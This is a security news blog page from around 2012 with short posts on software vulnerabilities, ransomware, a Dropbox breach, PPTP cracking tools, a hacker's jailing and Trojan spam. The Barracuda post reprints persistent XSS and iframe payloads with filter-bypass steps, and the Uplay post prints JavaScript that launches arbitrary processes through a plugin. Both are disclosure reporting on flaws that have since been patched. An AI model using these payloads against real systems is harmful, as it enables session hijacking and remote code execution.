Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Breaking News
Application Vulnerability Breaking News

CVE-2012-2665: LibreOffice vulnerable to multiple Heap-based buffer overflows


CVE-2012-2665: Few weeks after releasing the LibreOffice 3.5.5, The Document Foundation has confirmed that security holes in earlier versions of the open source LibreOffice .

According to the security advisory,  Multiple heap-based buffer overflow flaws were found in the XML manifest encryption tag parsing code of LibreOffice.

An attacker could create a specially-crafted file in the Open Document Format for Office Applications (ODF) format which when opened could cause arbitrary code execution.

Versions up to and including LibreOffice 3.5.4 are affected; Users are advised to upgrade your software to version 3.5.5 or 3.6.0.
Read more »
Security News
Security News

Opera 12.01 addresses Critical vulnerabilities in previous versions

Opera team has released updated version 12 of the Opera web browser that addresses a four important security holes.  The first of these is rated as critical by the company and affects all supported platforms.

 According to Opera, certain URL constructs can cause its browser to allocate the incorrect amount of memory for storing the address; this can be exploited by an attacker to overwrite unrelated memory with malicious data, possibly leading to the execution of arbitrary code.

Opera 12.01 addresses two high-severity errors that could have led to cross-site scripting (XSS) attacks when handling certain DOM elements and HTML characters.

A third high-risk problem has also been fixed which may have resulted in downloading and executing a malicious file; this is done by tricking a victim into clicking a hidden dialog box or by entering a specific keyboard sequence.

Versions up to and including 12.0 are affected; upgrading to 12.01 corrects these problems.
Read more »
Ransomware
Breaking News Malware Report Ransomware

1,100 UK computers infected by Police Ransomware



Cyber Criminals have managed to infect more than 1,100 computers with Ransomware to extort money from unsuspecting members of the public by impersonating the Met’s Police Central e-Crime Unit (PCeU).

According to press release, Police have received 1,100 reports from the public of the malware affecting their computers. 36 people in the UK have paid money, each losing £100.

The ransomware infects PCs after people accessed infected websites, and caused the PCs to freeze and lock, with a message purporting to be from the e-crime Unit advising the user they are required to pay a fine to unlock the computer.

"This is a fraud and users are advised NOT to pay out any monies or hand out any bank details. "Police representatives said. "This scam is now affecting many countries in Europe and further afield, with each email tailored to include the branding of that country's law enforcement agency. Europol are coordinating with Europe's law enforcement agencies on this matter."

Users are advised to install Internet Security software. You can also use Comodo IceDragon browser that will block malicious domains.
Read more »
Hzine
Hackers Magazine Hzine

Call For Papers for the first edition of Hzine


Hcon, Information security Training and Tools provider,  launched their own PenTesting Magazine 'Hzine'. We are inviting unique and interesting articles for our First Edition of Hzine.

Theme for the articles : Operating Systems (OS)

Articles can be on Topics :
1. Penetration testing / Hacking
2. Forensics
3. Malware
4. Exploit Development
5. Embedded, Mobile OS
6. OS Configs and Defenses
7. Offensive or Defensive Programming
8. About OS Tools, any specific OS articles
9. Troubleshooting any security issue
10. Any other OS related quality articles are also welcome

Things to consider for article submission :
1. It will be a free Magazine
2. It has to be your own work, research
3. It has to be in ENGLISH only
4. As we are not gaining any money from it, so don't expect from us to give you
5. Send articles in document format only (doc, docx, odt)
6. articles has to be with if any needed reference

Submit Your articles via this contact form .
Read more »
Security News
Featured Security News

Dropbox confirms it was hacked -Two-Factor Authentication Coming


When a few hundred Dropbox users began receiving spam emails about online casinos and gambling sites two weeks ago, it seemed like something was up. And indeed there was.

The online file storage service confirmed today that hackers accessed usernames and passwords from third party sites and then used them to get into Dropbox users' accounts.

"Our investigation found that usernames and passwords recently stolen from other websites were used to sign in to a small number of Dropbox accounts. We've contacted these users and have helped them protect their accounts," In a post on the Dropbox website, Aditya Agarwal, the company's director of engineering, wrote.

 "A stolen password was also used to access an employee Dropbox account containing a project document with user email addresses. We believe this improper access is what led to the spam."

Agarwal said that Dropbox will now offer two-factor authentication for members, giving the option of using two forms of identity before access to an account is granted. He said the company was also adding new automated systems to monitor suspicious activity and a new page allowing members to see all active logins on their account.

He added: "At the same time, we strongly recommend you improve your online safety by setting a unique password for each website you use. Though it’s easy to reuse the same password on different websites, this means if any one site is compromised, all your accounts are at risk."
Read more »
Vulnerability Lab
Breaking News Vulnerability Vulnerability Lab

Multiple Web Vulnerabilities found in Barracuda EMail Security 2.0.2

Vulnerability-Lab has discovered A filter bypass vulnerability & 2 persistent input validation vulnerabilities in Barracudas EMail Security Application UI v2.0.2.

The vulnerability allows an attacker (remote) to bypass the input validation & exception handling to inject or display own malicious persistent context on application side (persistent).

The vulnerabilities are located in the Domain Settings > Directory Services > LDAP Host module with the vulnerable bound name parameter. The secound persistent vulnerability is located in the reports module with the bound vulnerable parameters start date & end date.

 Exploitation requires low user inter action & privileged application user account. Successful exploitation of the vulnerability can lead to session hijacking (admin) or stable (persistent) context manipulation.

Vulnerability-Lab provide us the proof-of-concept for the two vulnerabilities.  Here it is:

POC for First Vulnerability:

Review: Domain Settings > Directory Services > LDAP Host

<div id="directory-services" class="module">
<h4 class="module-title">Directory Services</h4>
<div class="module-content">
<div class="warn notice" id="ldap-test-result" style=""><img src="/images/spinner1.gif"
alt="loading..."> Connecting to >"<iframe src="http://global-evolution.info">@gmail.com >"<script>alert(document.cookie)</script><div style="1@gmail.com 0</iframe></div>
<div style="float: right;">
<a href="https://ess.barracudanetworks.com/domains/sync_ldap/4&quot; class="btn"><span><span>Synchronize Now</span></span></a>
<a href="#" class="btn" id="ldap-test-btn"><span><span>Test Settings</span></span></a>
</div>
<p class="field">
<label class="label" for="ldap_host">LDAP Host:</label>
<input name="ldap_host" id="ldap_host" size="30" value=">
"<iframe src=http://global-evolution.info>@gmail.com >"<script>alert(document.cookie)</script><
div style="1@gmail.com 0" type="text">

URL: https://ess.127.0.0.1:1338/domains/info/4

PoC: >">"<iframe src=http://global-evolution.info>VL >"<div style="1 >">"

Note:
To bypass the validation close the tag of the exception handling on beginning with double quotes 2 times.
The mask of the exception (>") will be bypassed and the string will be executed out of the secure exception handling message.

POC for second vulnerability :
The persistent web vulnerability can be exploited by remote attackers with privileged user account & low user inter action.
For demonstration or reproduce ...

Vulnerable Module: Reports > Date Start > Date End

PoC: >"<iframe src=http://global-evolution.info&gt;

URL: https://ess.127.0.0.1:1338/reports

Note:
1. Include a start Date & End Date
2. Inject after the start date & end date your own persistent script code
3. Result: The script code get executed out of the date listing application context
4. Save value with script code to events for exploitation via module.

2012-06-20: Researcher Notification & Coordination
2012-06-23: Vendor Notification
2012-07-01: Vendor Response/Feedback
2012-07-24: Vendor Fix/Patch
2012-08-01: Public or Non-Public Disclosure

Researcher estimate the vulnerability risk level as medium . Vulnerability-Lab informed about the vulnerability to official vendor, They successfully patched the vulnerability and released BESS version 2.04.


Read more »
Malware Report
Malware Report

#Blackmuscats: Hacked sites redirected to Fake Antivirus site

Today, many sites compromised today with the Blackmuscats conditional redirection, says Sucuri. Anyone visiting the hacked sites are being redirected to Fake Antivirus sites.

Researcher named this campaign as Blackmuscats because all the compromised sites have .htaccess redirections pointing to URL ending in “blackmuscats?5″.

Note that this is a conditional redirection, so you are only sent to the malware site if you are coming from a search engine, not if you visit the site directly.

" If someone visits a compromised sites by clicking on a search engine results page, you will be sent to one of those domains we listed above and then to www1.antivirusworrydanger.pl (and similar AV related domains)" Researcher says.
Read more »
Vulnerability
Application Vulnerability Featured Vulnerability

Vulnerability in Ubisoft Uplay allows attacker to gain control of your computer



Google security Researcher ,Tavis Ormandy, has discovered a critical vulnerability in Ubisoft Uplay plugin software that could allow hackers to remotely install programs onto your PC.

It is possible for attackers to use a few lines of JavaScript to persuade the plugin to launch arbitrary processes – the potential victim only needs to open a specially crafted web page.

"While on vacation recently I bought a video game called 'Assassin's Creed Revelations,' he posted on the Full Disclosure mailing list. "I noticed the installation procedure creates a browser plugin for its accompanying Uplay launcher, which grants unexpectedly (at least to me) wide access to websites."

The javascript code that exploits the vulenrability:
var x = document.createElement('OBJECT');

x.setAttribute("type", "application/x-uplaypc");
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")
Here is a proof-of-concept page, users can check if their system is vulnerable: the page attempts to start the Windows Calculator.

Ubisoft has fixed a security flaw.

“We have made a forced patch to correct the flaw in the browser plug-in for the Uplay PC application that was brought to our attention earlier today. We recommend that all Uplay users update their Uplay PC application without a Web browser open. This will allow the plug-in to update correctly. An updated version of the Uplay PC installer with the patch also is available from Uplay.com."Ubisoft statement reads.

"Ubisoft takes security issues very seriously, and we will continue to monitor all reports of vulnerabilities within our software and take swift action to resolve such issues.”
Read more »
Software Release
DefCon Hackers Conference Security Tools Software Release

Tools released at Defcon can crack widely used PPTP encryption in under a day

Security researchers released two tools at the Defcon security conference which can be used to crack the encryption of any PPTP (Point-to-Point Tunneling Protocol) as well as WPA2-Enterprise (Wireless Protected Access) sessions which use MS-CHAPv2 for authentication.


MS-CHAPv2 is an authentication protocol created by Microsoft and introduced in Windows NT 4.0 SP4. Despite its age, it is still used as the primary authentication mechanism by most PPTP virtual private network (VPN) clients.

ChapCrack can take captured network traffic that contains a MS-CHAPv2 network handshake (PPTP VPN or WPA2 Enterprise handshake) and reduce the handshake's security to a single DES (Data Encryption Standard) key.


This DES key can then be submitted to CloudCracker.com -- a commercial online password cracking service that runs on a special FPGA cracking box developed by David Hulton of Pico Computing -- where it will be decrypted in under a day.


The CloudCracker output can then be used with ChapCrack to decrypt an entire session captured with WireShark or other similar network sniffing tools.


PPTP is commonly used by small and medium-size businesses -- large corporations use other VPN technologies like those provided by Cisco -- and it's also widely used by personal VPN service providers, Marlinspike said.


The researcher gave the example of IPredator, a VPN service from the creators of The Pirate Bay, which is marketed as a solution to evade ISP tracking, but only supports PPTP.


Marlinspike's advice to businesses and VPN providers was to stop using PPTP and switch to other technologies like IPsec or OpenVPN. Companies with wireless network deployments that use WPA2 Enterprise security with MS-CHAPv2 authentication should also switch to an alternative.

Read more »
Hackers Arrested
Breaking News Cyber Crime Hackers Arrested

Trick : Team Poison Hacker who leaked Tony Blair's data is jailed

A UK teenage Hacker who stole private information belonging to former British Prime Minister Tony Blair, and clogged up the UK's national anti-terrorism telephone hotline, has been jailed for six months.

Junaid Hussain, 17 and of Birmingham, the leader of the Team Poison group, broke into the Gmail account of Blair aide Katie Kay and stole information including Tony Blair's address and phone book - containing email addresses, phone numbers and postal addresses for Blair's family, friends and MPs.

When Hussain was arrested in April, a Facebook chat window on his computer bragged of "hacking a number of different people and organisations, including Tony Blair".

Hussain was duly sentenced to six months in prison.

"Hussain's actions were foolish and irresponsible," said detective inspector Stewart Garrick of the Police Central E-crime Unit.

"Today's sentencing emphasises the seriousness of his offence and should act as a deterrent to anyone else who feels that they can act in such a manner."
Read more »
Spam Report
Spam Report

Fake Groupon discount emails carry Trojan

Sophos security researcher spotted a new spam mails with the subject "Groupon discount gifts". 

The emails, which have the poorly spelt subject line of "Groupon dicount gifts" (in itself something which should ring alarm bells), pretend to come from Groupon, and claim that one of your friends has found a deal on the website.

The website says that your friend has decided to share the deal with you, and that you are receiving a discount code as a result.

Part of the email reads:

Hi there!
You're going to love it
We are glad to inform you that one of your friends has found a great deal on Groupon.com!
And even shared it with you!

Yeah! Now Groupon.com gives an opportunity to share a discount gift with a friend!
Enjoy your discount gift in the attachement and share it with one of your friend as well.

All the details in the file attached. be in a hurry this weekend special is due in 2 days!

Attached to the emails is a file called Gift coupon.zip, which contains a Trojan horse designed to infect Windows computers.
Read more »
Subscribe to: Comments (Atom)